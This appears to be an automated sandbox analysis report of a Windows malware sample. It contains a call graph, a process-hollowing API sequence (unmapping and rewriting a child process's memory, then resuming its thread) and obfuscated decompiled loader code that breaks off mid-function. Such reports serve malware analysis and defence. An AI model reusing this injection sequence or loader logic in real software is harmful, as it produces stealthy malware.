_LocaleUpdate::_LocaleUpdate 75 API calls 5703->5704 5705 40997c 5704->5705 5706 4099a5 5705->5706 5707 409987 GetOEMCP 5705->5707 5708 4099aa GetACP 5706->5708 5709 409997 5706->5709 5707->5709 5708->5709 5709->5680 5709->5682 5711 409968 getSystemCP 77 API calls 5710->5711 5712 409a04 5711->5712 5713 409a0f setSBCS 5712->5713 5716 409a53 IsValidCodePage 5712->5716 5719 409a78 _memset __setmbcp_nolock 5712->5719 5714 404c9b __setmbcp_nolock 5 API calls 5713->5714 5715 409bc7 5714->5715 5715->5685 5715->5686 5716->5713 5717 409a65 GetCPInfo 5716->5717 5717->5713 5717->5719 5723 4096aa GetCPInfo 5719->5723 5856 408120 LeaveCriticalSection 5720->5856 5722 409d31 5722->5682 5724 409790 5723->5724 5726 4096de _memset 5723->5726 5729 404c9b __setmbcp_nolock 5 API calls 5724->5729 5733 40aed0 5726->5733 5731 40983b 5729->5731 5731->5719 5732 40b305 ___crtLCMapStringA 100 API calls 5732->5724 5734 4098e1 _LocaleUpdate::_LocaleUpdate 75 API calls 5733->5734 5735 40aee3 5734->5735 5743 40ad16 5735->5743 5738 40b305 5739 4098e1 _LocaleUpdate::_LocaleUpdate 75 API calls 5738->5739 5740 40b318 5739->5740 5809 40af60 5740->5809 5744 40ad62 5743->5744 5745 40ad37 GetStringTypeW 5743->5745 5747 40ad4f 5744->5747 5749 40ae49 5744->5749 5746 40ad57 GetLastError 5745->5746 5745->5747 5746->5744 5748 40ad9b MultiByteToWideChar 5747->5748 5750 40ae43 5747->5750 5748->5750 5756 40adc8 5748->5756 5771 40b61c GetLocaleInfoA 5749->5771 5752 404c9b __setmbcp_nolock 5 API calls 5750->5752 5754 40974b 5752->5754 5754->5738 5755 40ae9a GetStringTypeExA 5755->5750 5759 40aeb5 5755->5759 5760 40addd _memset __crtLCMapStringA_stat 5756->5760 5761 404dca _malloc 65 API calls 5756->5761 5758 40ae16 MultiByteToWideChar 5763 40ae2c GetStringTypeW 5758->5763 5764 40ae3d 5758->5764 5765 404e94 __setmbcp 65 API calls 5759->5765 5760->5750 5760->5758 5761->5760 5763->5764 5767 40acab 5764->5767 5765->5750 5768 40acb7 5767->5768 5769 40acc8 5767->5769 5768->5769 5770 404e94 __setmbcp 65 API calls 5768->5770 5769->5750 5770->5769 5772 40b64f 5771->5772 5775 40b64a 5771->5775 5802 40a6f4 5772->5802 5774 404c9b __setmbcp_nolock 5 API calls 5776 40ae6d 5774->5776 5775->5774 5776->5750 5776->5755 5777 40b665 5776->5777 5778 40b6a5 GetCPInfo 5777->5778 5782 40b72f 5777->5782 5779 40b71a MultiByteToWideChar 5778->5779 5780 40b6bc 5778->5780 5779->5782 5786 40b6d5 _strlen 5779->5786 5780->5779 5783 40b6c2 GetCPInfo 5780->5783 5781 404c9b __setmbcp_nolock 5 API calls 5784 40ae8e 5781->5784 5782->5781 5783->5779 5785 40b6cf 5783->5785 5784->5750 5784->5755 5785->5779 5785->5786 5787 404dca _malloc 65 API calls 5786->5787 5791 40b707 _memset __crtLCMapStringA_stat 5786->5791 5787->5791 5788 40b764 MultiByteToWideChar 5789 40b79b 5788->5789 5790 40b77c 5788->5790 5794 40acab __freea 65 API calls 5789->5794 5792 40b7a0 5790->5792 5793 40b783 WideCharToMultiByte 5790->5793 5791->5782 5791->5788 5795 40b7ab WideCharToMultiByte 5792->5795 5796 40b7bf 5792->5796 5793->5789 5794->5782 5795->5789 5795->5796 5797 4091a3 __calloc_crt 65 API calls 5796->5797 5798 40b7c7 5797->5798 5798->5789 5799 40b7d0 WideCharToMultiByte 5798->5799 5799->5789 5800 40b7e2 5799->5800 5801 404e94 __setmbcp 65 API calls 5800->5801 5801->5789 5805 40b582 5802->5805 5806 40b59b 5805->5806 5807 40b353 strtoxl 89 API calls 5806->5807 5808 40a705 5807->5808 5808->5775 5810 40af81 LCMapStringW 5809->5810 5813 40af9c 5809->5813 5811 40afa4 GetLastError 5810->5811 5810->5813 5811->5813 5812 40b19a 5815 40b61c ___ansicp 89 API calls 5812->5815 5813->5812 5814 40aff6 5813->5814 5816 40b00f MultiByteToWideChar 5814->5816 5838 40b191 5814->5838 5818 40b1c2 5815->5818 5823 40b03c 5816->5823 5816->5838 5817 404c9b __setmbcp_nolock 5 API calls 5819 40976b 5817->5819 5820 40b2b6 LCMapStringA 5818->5820 5821 40b1db 5818->5821 5818->5838 5819->5732 5855 40b212 5820->5855 5824 40b665 ___convertcp 72 API calls 5821->5824 5822 40b08d MultiByteToWideChar 5825 40b0a6 LCMapStringW 5822->5825 5850 40b188 5822->5850 5827 404dca _malloc 65 API calls 5823->5827 5834 40b055 __crtLCMapStringA_stat 5823->5834 5828 40b1ed 5824->5828 5829 40b0c7 5825->5829 5825->5850 5826 40b2dd 5836 404e94 __setmbcp 65 API calls 5826->5836 5826->5838 5827->5834 5831 40b1f7 LCMapStringA 5828->5831 5828->5838 5833 40b0d0 5829->5833 5841 40b0f9 5829->5841 5830 404e94 __setmbcp 65 API calls 5830->5826 5839 40b219 5831->5839 5831->5855 5832 40acab __freea 65 API calls 5832->5838 5837 40b0e2 LCMapStringW 5833->5837 5833->5850 5834->5822 5834->5838 5835 40b114 __crtLCMapStringA_stat 5840 40b148 LCMapStringW 5835->5840 5835->5850 5836->5838 5837->5850 5838->5817 5842 404dca _malloc 65 API calls 5839->5842 5848 40b22a _memset __crtLCMapStringA_stat 5839->5848 5843 40b182 5840->5843 5845 40b160 WideCharToMultiByte 5840->5845 5841->5835 5844 404dca _malloc 65 API calls 5841->5844 5842->5848 5846 40acab __freea 65 API calls 5843->5846 5844->5835 5845->5843 5846->5850 5847 40b268 LCMapStringA 5851 40b284 5847->5851 5852 40b288 5847->5852 5848->5847 5848->5855 5850->5832 5854 40acab __freea 65 API calls 5851->5854 5853 40b665 ___convertcp 72 API calls 5852->5853 5853->5851 5854->5855 5855->5826 5855->5830 5856->5722 5858 40a223 5857->5858 5859 406793 __encode_pointer 6 API calls 5858->5859 5860 40a23b 5858->5860 5859->5858 5860->5018 5864 405a50 5861->5864 5863 405a99 5863->5020 5865 405a5c __setmbcp 5864->5865 5872 407168 5865->5872 5871 405a7d __setmbcp 5871->5863 5873 4081fa __lock 65 API calls 5872->5873 5874 405a61 5873->5874 5875 405965 5874->5875 5876 40680e __decode_pointer 5 API calls 5875->5876 5877 405979 5876->5877 5878 40680e __decode_pointer 5 API calls 5877->5878 5879 405989 5878->5879 5888 405a0c 5879->5888 5895 40923d 5879->5895 5881 406793 __encode_pointer 6 API calls 5882 405a01 5881->5882 5884 406793 __encode_pointer 6 API calls 5882->5884 5883 4059a7 5886 4059cb 5883->5886 5891 4059f3 5883->5891 5908 4091ef 5883->5908 5884->5888 5887 4091ef __realloc_crt 71 API calls 5886->5887 5886->5888 5889 4059e1 5886->5889 5887->5889 5892 405a86 5888->5892 5889->5888 5890 406793 __encode_pointer 6 API calls 5889->5890 5890->5891 5891->5881 5957 407171 5892->5957 5896 409249 __setmbcp 5895->5896 5897 409276 5896->5897 5898 409259 5896->5898 5899 4092b7 HeapSize 5897->5899 5901 4081fa __lock 65 API calls 5897->5901 5900 4055b4 __setmbcp 65 API calls 5898->5900 5904 40926e __setmbcp 5899->5904 5902 40925e 5900->5902 5905 409286 ___sbh_find_block 5901->5905 5903 40554c __calloc_impl 5 API calls 5902->5903 5903->5904 5904->5883 5913 4092d7 5905->5913 5911 4091f8 5908->5911 5910 409237 5910->5886 5911->5910 5912 409218 Sleep 5911->5912 5917 40a828 5911->5917 5912->5911 5916 408120 LeaveCriticalSection 5913->5916 5915 4092b2 5915->5899 5915->5904 5916->5915 5918 40a834 __setmbcp 5917->5918 5919 40a849 5918->5919 5920 40a83b 5918->5920 5921 40a850 5919->5921 5922 40a85c 5919->5922 5923 404dca _malloc 65 API calls 5920->5923 5924 404e94 __setmbcp 65 API calls 5921->5924 5929 40a9ce 5922->5929 5942 40a869 _realloc ___sbh_resize_block ___sbh_find_block 5922->5942 5944 40a843 _realloc __setmbcp 5923->5944 5924->5944 5925 40aa01 5926 405ab2 __calloc_impl 5 API calls 5925->5926 5930 40aa07 5926->5930 5927 4081fa __lock 65 API calls 5927->5942 5928 40a9d3 HeapReAlloc 5928->5929 5928->5944 5929->5925 5929->5928 5931 40aa25 5929->5931 5933 405ab2 __calloc_impl 5 API calls 5929->5933 5935 40aa1b 5929->5935 5932 4055b4 __setmbcp 65 API calls 5930->5932 5934 4055b4 __setmbcp 65 API calls 5931->5934 5931->5944 5932->5944 5933->5929 5936 40aa2e GetLastError 5934->5936 5938 4055b4 __setmbcp 65 API calls 5935->5938 5936->5944 5952 40a99c 5938->5952 5939 40a8f4 HeapAlloc 5939->5942 5940 40a9a1 GetLastError 5940->5944 5941 40a949 HeapReAlloc 5941->5942 5942->5925 5942->5927 5942->5939 5942->5941 5943 408a0c ___sbh_alloc_block 5 API calls 5942->5943 5942->5944 5945 40a9b4 5942->5945 5946 405ab2 __calloc_impl 5 API calls 5942->5946 5947 40825d __VEC_memcpy VirtualFree VirtualFree HeapFree ___sbh_free_block 5942->5947 5949 40a997 5942->5949 5953 40a96c 5942->5953 5943->5942 5944->5911 5945->5944 5948 4055b4 __setmbcp 65 API calls 5945->5948 5946->5942 5947->5942 5950 40a9c1 5948->5950 5951 4055b4 __setmbcp 65 API calls 5949->5951 5950->5936 5950->5944 5951->5952 5952->5940 5952->5944 5956 408120 LeaveCriticalSection 5953->5956 5955 40a973 5955->5942 5956->5955 5960 408120 LeaveCriticalSection 5957->5960 5959 405a8b 5959->5871 5960->5959 5964 4034b7 5961->5964 5962 4034c6 CharUpperBuffW SetLastError 5962->5964 5963 4034de WinHttpCreateUrl 5963->5964 5964->5962 5964->5963 5965 403514 5964->5965 5966 403532 QueryMemoryResourceNotification 5965->5966 5967 403546 LocalAlloc 5965->5967 5966->5965 5968 4035b1 5967->5968 5969 403568 5967->5969 5971 4035cb 14 API calls 5968->5971 5972 40367c 5968->5972 5969->5968 5973 403577 RegisterWaitForSingleObject GetNamedPipeHandleStateW InterlockedDecrement 5969->5973 6022 403304 5969->6022 5971->5968 5974 40368d LoadLibraryA 5972->5974 5975 40369d GetModuleHandleA 5972->5975 5976 4036b5 5972->5976 5973->5969 5974->5972 5975->5972 5977 4036e2 5976->5977 6013 4033ab LoadLibraryA 5976->6013 6015 4032ab 5977->6015 5980 403703 InterlockedDecrement 5981 4036f8 5980->5981 5981->5980 5982 403720 5981->5982 6021 402ff7 LoadLibraryA 5982->6021 5984 403725 5985 403735 10 API calls 5984->5985 5986 4037bf 5984->5986 5985->5986 5987 403870 5986->5987 5988 4037cc 14 API calls 5986->5988 5987->5038 5988->5987 5990 404a31 5989->5990 5991 404a29 GetLastError 5989->5991 5992 404a43 5990->5992 6032 4055da 5990->6032 5991->5990 5992->5030 5996 404a01 5995->5996 5997 4049f9 GetLastError 5995->5997 5998 404a13 5996->5998 5999 4055da __dosmaperr 65 API calls 5996->5999 5997->5996 5998->5035 6000 404a0d 5999->6000 6000->5035 6002 4040d7 std::_String_base::_Xlen __EH_prolog 6001->6002 6040 403d45 6002->6040 6008 40495b __setmbcp 6007->6008 6009 406a5a __getptd 65 API calls 6008->6009 6010 404960 6009->6010 6244 406d7c 6010->6244 6014 40348d VirtualProtect 6013->6014 6014->5976 6016 4032bd MoveFileWithProgressW 6015->6016 6019 4032c8 6015->6019 6016->6019 6017 4032fd 6017->5981 6018 4032e2 CopyFileExA 6018->6019 6019->6017 6019->6018 6025 4030eb 6019->6025 6021->5984 6023 403316 8 API calls 6022->6023 6024 40337a 6022->6024 6023->6024 6024->5969 6028 4030f8 6025->6028 6026 403141 FindCloseChangeNotification 6026->6028 6027 403164 FindNextVolumeA SetLocaleInfoA SetSystemTimeAdjustment InterlockedDecrement LocalFree 6027->6028 6028->6026 6028->6027 6029 4031d4 GetComputerNameA GetVolumeInformationA ReadConsoleW 6028->6029 6030 403234 ReadFile GetConsoleAliasesW InterlockedPushEntrySList 6028->6030 6031 40329c 6028->6031 6029->6028 6030->6028 6031->6019 6037 4055c7 6032->6037 6034 4055e5 _realloc 6035 4055b4 __setmbcp 65 API calls 6034->6035 6036 404a3d 6035->6036 6036->5030 6038 4069e1 __getptd_noexit 65 API calls 6037->6038 6039 4055cc 6038->6039 6039->6034 6041 403d5b std::_String_base::_Xlen 6040->6041 6050 403c20 6041->6050 6043 403d62 6044 404083 6043->6044 6045 4038a7 6044->6045 6046 4040a0 6044->6046 6045->5040 6045->5041 6047 4040ae 6046->6047 6099 403fec 6046->6099 6107 403ae1 6047->6107 6053 403b02 6050->6053 6052 403c2d 6052->6043 6056 4039c8 6053->6056 6057 4039d5 6056->6057 6058 4039e7 6056->6058 6066 404496 6057->6066 6058->6057 6059 4039f3 6058->6059 6078 402f40 6059->6078 6065 403a0b 6068 4044a0 6066->6068 6067 404dca _malloc 65 API calls 6067->6068 6068->6067 6069 4039e2 6068->6069 6070 405ab2 __calloc_impl 5 API calls 6068->6070 6073 4044bc std::bad_alloc::bad_alloc 6068->6073 6069->6052 6070->6068 6075 405a8c __cinit 72 API calls 6073->6075 6077 4044e2 6073->6077 6074 4044fb __CxxThrowException@8 RaiseException 6076 4044fa 6074->6076 6075->6077 6084 403a4b 6077->6084 6093 4041fa 6078->6093 6081 4044fb 6082 404530 RaiseException 6081->6082 6083 404524 6081->6083 6082->6065 6083->6082 6087 40426a 6084->6087 6088 403a59 6087->6088 6089 40428a _strlen 6087->6089 6088->6074 6089->6088 6090 404dca _malloc 65 API calls 6089->6090 6091 40429d 6090->6091 6091->6088 6092 404d13 _strcpy_s 65 API calls 6091->6092 6092->6088 6094 404213 _strlen 6093->6094 6095 402f4f 6093->6095 6096 404dca _malloc 65 API calls 6094->6096 6095->6081 6097 404222 6096->6097 6097->6095 6098 404d13 _strcpy_s 65 API calls 6097->6098 6098->6095 6100 403ff6 __EH_prolog 6099->6100 6110 403fbb 6100->6110 6105 4044fb __CxxThrowException@8 RaiseException 6106 404024 6105->6106 6234 403986 6107->6234 6111 403fc9 std::_String_base::_Xlen 6110->6111 6119 403b71 6111->6119 6113 403fdb 6123 403f1b 6113->6123 6116 403f76 6225 403f3a 6116->6225 6120 403b9b std::_String_base::_Xlen 6119->6120 6121 403b7d 6119->6121 6120->6113 6121->6120 6127 403b24 6121->6127 6124 403f29 std::_String_base::_Xlen 6123->6124 6146 403e98 6124->6146 6126 403f35 6126->6116 6128 403b2d std::_String_base::_Xlen 6127->6128 6131 403a6f 6128->6131 6134 402fb1 6131->6134 6137 404367 6134->6137 6136 402fc5 6136->6120 6141 404377 _realloc 6137->6141 6142 40437b _memset 6137->6142 6138 404380 6139 4055b4 __setmbcp 65 API calls 6138->6139 6140 404385 6139->6140 6143 40554c __calloc_impl 5 API calls 6140->6143 6141->6136 6142->6138 6142->6141 6144 4043ca 6142->6144 6143->6141 6144->6141 6145 4055b4 __setmbcp 65 API calls 6144->6145 6145->6140 6147 403ea8 std::_String_base::_Xlen 6146->6147 6148 403ec3 6147->6148 6149 403eae std::bad_exception::bad_exception 6147->6149 6168 403d69 6148->6168 6155 403e12 6149->6155 6152 403ec1 std::_String_base::_Xlen 6152->6126 6153 403ecd std::bad_exception::bad_exception 6153->6152 6154 403b24 std::_String_base::_Xlen 65 API calls 6153->6154 6154->6152 6156 403e22 std::bad_exception::bad_exception 6155->6156 6158 403e2e std::bad_exception::bad_exception 6156->6158 6177 404194 6156->6177 6159 403e49 6158->6159 6160 403e5f 6158->6160 6187 403bbf 6159->6187 6162 403d69 std::bad_exception::bad_exception 73 API calls 6160->6162 6165 403e67 std::bad_exception::bad_exception 6162->6165 6163 403e53 6164 403bbf std::bad_exception::bad_exception 73 API calls 6163->6164 6167 403e5d std::_String_base::_Xlen 6164->6167 6166 403b24 std::_String_base::_Xlen 65 API calls 6165->6166 6165->6167 6166->6167 6167->6152 6169 403d75 std::bad_exception::bad_exception 6168->6169 6170 403d81 6169->6170 6206 40415c 6169->6206 6172 403d86 6170->6172 6175 403d93 6170->6175 6214 403c4f 6172->6214 6174 403d91 std::_String_base::_Xlen 6174->6153 6175->6174 6176 403b71 std::_String_base::_Xlen 65 API calls 6175->6176 6176->6174 6178 4041a0 __EH_prolog3 6177->6178 6179 403fbb std::_String_base::_Xlen 73 API calls 6178->6179 6180 4041ad 6179->6180 6193 40410d 6180->6193 6183 4044fb __CxxThrowException@8 RaiseException 6184 4041cb 6183->6184 6196 404025 6184->6196 6188 403bcf 6187->6188 6190 403bd4 std::bad_exception::bad_exception 6187->6190 6189 404194 std::bad_exception::bad_exception 73 API calls 6188->6189 6189->6190 6192 403c0a std::_String_base::_Xlen 6190->6192 6202 403b48 6190->6202 6192->6163 6194 403f3a std::bad_exception::bad_exception 73 API calls 6193->6194 6195 40411d 6194->6195 6195->6183 6197 40402f __EH_prolog 6196->6197 6198 40426a std::exception::exception 65 API calls 6197->6198 6199 404040 6198->6199 6200 403ef7 std::bad_exception::bad_exception 73 API calls 6199->6200 6201 404056 6200->6201 6201->6158 6203 403b51 std::_String_base::_Xlen 6202->6203 6204 403a8a std::bad_exception::bad_exception 65 API calls 6203->6204 6205 403b68 6204->6205 6205->6192 6207 404168 __EH_prolog3 6206->6207 6208 403fbb std::_String_base::_Xlen 73 API calls 6207->6208 6209 404175 6208->6209 6210 403f76 std::bad_exception::bad_exception 73 API calls 6209->6210 6211 404185 6210->6211 6212 4044fb __CxxThrowException@8 RaiseException 6211->6212 6213 404193 6212->6213 6215 403c59 __EH_prolog std::bad_exception::bad_exception 6214->6215 6222 403b13 6215->6222 6217 403cb2 std::bad_exception::bad_exception 6218 403cfa 6217->6218 6221 403b24 std::_String_base::_Xlen 65 API calls 6217->6221 6219 403b71 std::_String_base::_Xlen 65 API calls 6218->6219 6220 403d05 std::_String_base::_Xlen 6219->6220 6220->6174 6221->6218 6223 403a0c std::bad_exception::bad_exception 73 API calls 6222->6223 6224 403b20 6223->6224 6224->6217 6226 403f44 __EH_prolog std::bad_exception::bad_exception 6225->6226 6229 403ef7 6226->6229 6230 403b71 std::_String_base::_Xlen 65 API calls 6229->6230 6231 403f06 6230->6231 6232 403e12 std::bad_exception::bad_exception 73 API calls 6231->6232 6233 403f14 6232->6233 6233->6105 6235 4039a3 6234->6235 6236 403993 6234->6236 6235->6236 6237 4039af 6235->6237 6238 404496 std::bad_exception::bad_exception 73 API calls 6236->6238 6239 402f40 std::bad_exception::bad_exception 65 API calls 6237->6239 6240 40399e 6238->6240 6241 4039b9 6239->6241 6240->6045 6242 4044fb __CxxThrowException@8 RaiseException 6241->6242 6243 4039c7 6242->6243 6245 406da2 6244->6245 6246 406d9b 6244->6246 6256 409f10 6245->6256 6247 407404 __NMSG_WRITE 65 API calls 6246->6247 6247->6245 6250 406db3 _memset 6251 406e8b 6250->6251 6254 406e4b SetUnhandledExceptionFilter UnhandledExceptionFilter 6250->6254 6280 407382 6251->6280 6254->6251 6257 40680e __decode_pointer 5 API calls 6256->6257 6258 406da8 6257->6258 6258->6250 6259 409f1d 6258->6259 6263 409f29 __setmbcp 6259->6263 6260 409f85 6261 409f66 6260->6261 6266 409f94 6260->6266 6265 40680e __decode_pointer 5 API calls 6261->6265 6262 409f50 6264 4069e1 __getptd_noexit 65 API calls 6262->6264 6263->6260 6263->6261 6263->6262 6269 409f4c 6263->6269 6267 409f55 _siglookup 6264->6267 6265->6267 6268 4055b4 __setmbcp 65 API calls 6266->6268 6271 409ffb 6267->6271 6273 407382 _raise 65 API calls 6267->6273 6279 409f5e __setmbcp 6267->6279 6270 409f99 6268->6270 6269->6262 6269->6266 6272 40554c __calloc_impl 5 API calls 6270->6272 6274 4081fa __lock 65 API calls 6271->6274 6276 40a006 6271->6276 6272->6279 6273->6271 6274->6276 6275 406805 FindHandlerForForeignException 6 API calls 6277 40a03b 6275->6277 6276->6275 6276->6277 6283 40a091 6277->6283 6279->6250 6288 407240 6280->6288 6282 406e92 6284 40a097 6283->6284 6285 40a09e 6283->6285 6287 408120 LeaveCriticalSection 6284->6287 6285->6279 6287->6285 6289 40724c __setmbcp 6288->6289 6290 4081fa __lock 65 API calls 6289->6290 6291 407253 6290->6291 6293 40680e __decode_pointer 5 API calls 6291->6293 6297 40730c __initterm 6291->6297 6295 40728a 6293->6295 6295->6297 6299 40680e __decode_pointer 5 API calls 6295->6299 6296 407354 __setmbcp 6296->6282 6305 407357 6297->6305 6304 40729f 6299->6304 6300 40734b 6301 407150 _fast_error_exit 2 API calls 6300->6301 6301->6296 6302 406805 6 API calls FindHandlerForForeignException 6302->6304 6303 40680e 5 API calls __decode_pointer 6303->6304 6304->6297 6304->6302 6304->6303 6306 40735d 6305->6306 6308 407338 6305->6308 6310 408120 LeaveCriticalSection 6306->6310 6308->6296 6309 408120 LeaveCriticalSection 6308->6309 6309->6300 6310->6308 6411 40707c 6412 4070b8 6411->6412 6413 40708e 6411->6413 6413->6412 6414 40494f FindHandler 67 API calls 6413->6414 6414->6412 6758 4070be SetUnhandledExceptionFilter

                    Control-flow Graph

                    APIs
                    • VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 00610156
                    • GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 0061016C
                    • CreateProcessA.KERNELBASE(?,00000000), ref: 00610255
                    • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00610270
                    • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 00610283
                    • GetThreadContext.KERNELBASE(00000000,?), ref: 0061029F
                    • ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 006102C8
                    • NtUnmapViewOfSection.NTDLL(00000000,?), ref: 006102E3
                    • VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 00610304
                    • NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 0061032A
                    • NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 00610399
                    • WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 006103BF
                    • SetThreadContext.KERNELBASE(00000000,?), ref: 006103E1
                    • ResumeThread.KERNELBASE(00000000), ref: 006103ED
                    • ExitProcess.KERNEL32(00000000), ref: 00610412
                    Memory Dump Source
                    • Source File: 00000005.00000002.425990913.0000000000610000.00000040.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_610000_vwhdahh.jbxd
                    Similarity
                    • API ID: Virtual$MemoryProcess$AllocThreadWrite$Context$CreateExitFileFreeModuleNameReadResumeSectionUnmapView
                    • String ID:
                    • API String ID: 2875986403-0
                    • Opcode ID: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                    • Instruction ID: a0974bd293913474c5c4da59cd913cf5ef8b0bba3d8a6ded708e5ab95eff7282
                    • Opcode Fuzzy Hash: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                    • Instruction Fuzzy Hash: 3BB1B674A00209AFDB44CF98C895FDEBBB5BF88314F248158E509AB391D771AE81CF94
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 0 4034aa-4034bc call 404450 3 4034be-4034c4 0->3 4 4034d5-4034dc 3->4 5 4034c6-4034cf CharUpperBuffW SetLastError 3->5 6 4034f1-4034f7 4->6 7 4034de-4034eb WinHttpCreateUrl 4->7 5->4 8 4034f9-403500 6->8 9 40350b-403512 6->9 7->6 8->9 10 403502-403509 8->10 9->3 11 403514 9->11 10->9 10->11 12 403516-40351c 11->12 13 403529-403530 12->13 14 40351e-403523 12->14 15 403532-403537 QueryMemoryResourceNotification 13->15 16 40353d-403544 13->16 14->13 15->16 16->12 17 403546-403566 LocalAlloc 16->17 18 4035b1-4035b7 17->18 19 403568-403575 call 403304 17->19 20 4035be-4035c5 18->20 26 403577-4035a2 RegisterWaitForSingleObject GetNamedPipeHandleStateW InterlockedDecrement 19->26 27 4035a8-4035af 19->27 22 403673-403676 20->22 23 4035cb-403671 EnumDateFormatsA InterlockedExchangeAdd DeleteFiber GetPrivateProfileStructA InitializeCriticalSectionAndSpinCount InterlockedExchange RtlCaptureContext FindResourceW LocalSize OpenMutexW GetStringTypeExA GetComputerNameA LeaveCriticalSection RegisterWaitForSingleObject 20->23 22->20 25 40367c-40367f 22->25 23->22 28 403684-40368b 25->28 26->27 27->18 27->19 29 403694-40369b 28->29 30 40368d-40368e LoadLibraryA 28->30 31 4036a9-4036b3 29->31 32 40369d-4036a4 GetModuleHandleA 29->32 30->29 31->28 33 4036b5-4036cd 31->33 32->31 35 4036cf-4036d2 33->35 36 4036d4 call 4033ab 35->36 37 4036d9-4036e0 35->37 36->37 37->35 38 4036e2-4036f8 call 4032ab 37->38 42 4036fa-403701 38->42 43 403703-403704 InterlockedDecrement 42->43 44 40370a-403710 42->44 43->44 45 403712 call 40339d 44->45 46 403717-40371e 44->46 45->46 46->42 48 403720 call 402ff7 46->48 50 403725-40372f 48->50 51 403735-4037b9 GetModuleHandleW FormatMessageA CreateActCtxW VerifyVersionInfoW InterlockedIncrement * 2 GetCommandLineA WriteConsoleOutputW GetBinaryTypeA GetCommandLineA 50->51 52 4037bf-4037c6 50->52 51->52 53 403870-40387b call 403397 52->53 54 4037cc-40386a WriteConsoleW lstrcpynW CopyFileA LoadLibraryA MoveFileWithProgressA PostQueuedCompletionStatus GetCPInfo InterlockedDecrement GetPrivateProfileStructA DeleteVolumeMountPointA GetVolumeNameForVolumeMountPointA GetConsoleAliasesLengthW GetFileTime GetStringTypeW 52->54 54->53
                    C-Code - Quality: 70%
                    			E004034AA(void* __ecx) {
                    				void* _v6;
                    				short _v8;
                    				void* _v10;
                    				long _v12;
                    				struct _FILETIME _v20;
                    				long _v24;
                    				struct _FILETIME _v32;
                    				long _v36;
                    				struct _FILETIME _v44;
                    				void* _v60;
                    				struct _OVERLAPPED _v64;
                    				struct _CRITICAL_SECTION _v68;
                    				struct _CRITICAL_SECTION _v92;
                    				intOrPtr _v96;
                    				char _v100;
                    				struct _OSVERSIONINFOEXW _v392;
                    				void _v1416;
                    				short _v2440;
                    				char _v3156;
                    				void _v4180;
                    				short _v5204;
                    				void* _t61;
                    				long _t86;
                    				void* _t137;
                    				intOrPtr* _t138;
                    				CHAR* _t139;
                    				void* _t140;
                    				void* _t141;
                    				int _t146;
                    				void* _t147;
                    				void* _t148;
                    				long _t162;
                    				void* _t164;
                    
                    				_t137 = __ecx;
                    				E00404450(0x1450);
                    				_t146 = 0;
                    				L1:
                    				L1:
                    				if(_t146 < 0x14d003) {
                    					CharUpperBuffW(0, 0);
                    					SetLastError(0);
                    				}
                    				if( *0x57a190 == 0x6b) {
                    					__imp__WinHttpCreateUrl(0, 0,  &_v2440,  &(_v20.dwHighDateTime));
                    				}
                    				if(_t146 <= 0x1e9d5e41 || _v20.dwHighDateTime == 0xad5cf7 || _v96 == 0xad4c41c) {
                    					goto L8;
                    				}
                    				L9:
                    				_t147 = 0;
                    				do {
                    					if(_t147 == 0x420) {
                    						 *0x57a190 =  *0x57a190 + 0x38d6;
                    					}
                    					if( *0x57a190 == 0x7a) {
                    						__imp__QueryMemoryResourceNotification(0,  &(_v20.dwHighDateTime));
                    					}
                    					_t147 = _t147 + 1;
                    				} while (_t147 < 0x40dece);
                    				_t61 = LocalAlloc(0,  *0x57a190); // executed
                    				_t138 = __imp__RegisterWaitForSingleObject;
                    				_t148 = 0;
                    				 *0x574b0c = _t61;
                    				_t162 =  *0x57a190; // 0xf298
                    				if(_t162 > 0) {
                    					do {
                    						E00403304(_t148);
                    						if( *0x57a190 == 0x1f) {
                    							 *_t138(0, 0, 0, 0, 0, 0);
                    							GetNamedPipeHandleStateW(0,  &(_v32.dwHighDateTime),  &_v8,  &_v12,  &(_v20.dwHighDateTime),  &_v2440, 0);
                    							InterlockedDecrement( &_v24);
                    						}
                    						_t148 = _t148 + 1;
                    						_t164 = _t148 -  *0x57a190; // 0xf298
                    					} while (_t164 < 0);
                    				}
                    				_v12 = 0x5aedbe7;
                    				do {
                    					if( *0x57a190 == 0x37) {
                    						EnumDateFormatsA(0, 0, 0);
                    						InterlockedExchangeAdd( &_v24, 0);
                    						DeleteFiber(0);
                    						GetPrivateProfileStructA("gosizepeyabuxijavusadiculihazasa", "sijewenudapegiginotolut",  &_v4180, 0, "mupexabetor");
                    						InitializeCriticalSectionAndSpinCount( &_v68, 0);
                    						InterlockedExchange(0, 0);
                    						__imp__RtlCaptureContext( &_v3156);
                    						FindResourceW(0, 0, 0);
                    						LocalSize(0);
                    						OpenMutexW(0, 0, 0);
                    						GetStringTypeExA(0, 0, "Dopayenecavet", 0,  &_v8);
                    						GetComputerNameA( &_v1416,  &(_v32.dwHighDateTime));
                    						LeaveCriticalSection( &_v92);
                    						_v20.dwHighDateTime = 0;
                    						 *_t138( &(_v20.dwHighDateTime), 0, 0, 0, 0, 0);
                    					}
                    					_t23 =  &_v12;
                    					 *_t23 = _v12 - 1;
                    				} while ( *_t23 != 0);
                    				_v8 = 0;
                    				_t139 = "msimg32.dll";
                    				do {
                    					if( *0x57a190 == 0x2e) {
                    						LoadLibraryA(0);
                    					}
                    					if(_v8 == 0x76069) {
                    						 *0x57860c = GetModuleHandleA(_t139);
                    					}
                    					_v8 = _v8 + 1;
                    				} while (_v8 < 0x1756bb);
                    				"msimg32.dll" = 0;
                    				"`ghvmsimg32.dll" = GetProcAddress( *0x57860c, _t139);
                    				_t140 = 0;
                    				do {
                    					if(_t140 == 0x1c) {
                    						E004033AB(_t137); // executed
                    					}
                    					_t140 = _t140 + 1;
                    				} while (_t140 < 0x3debc7);
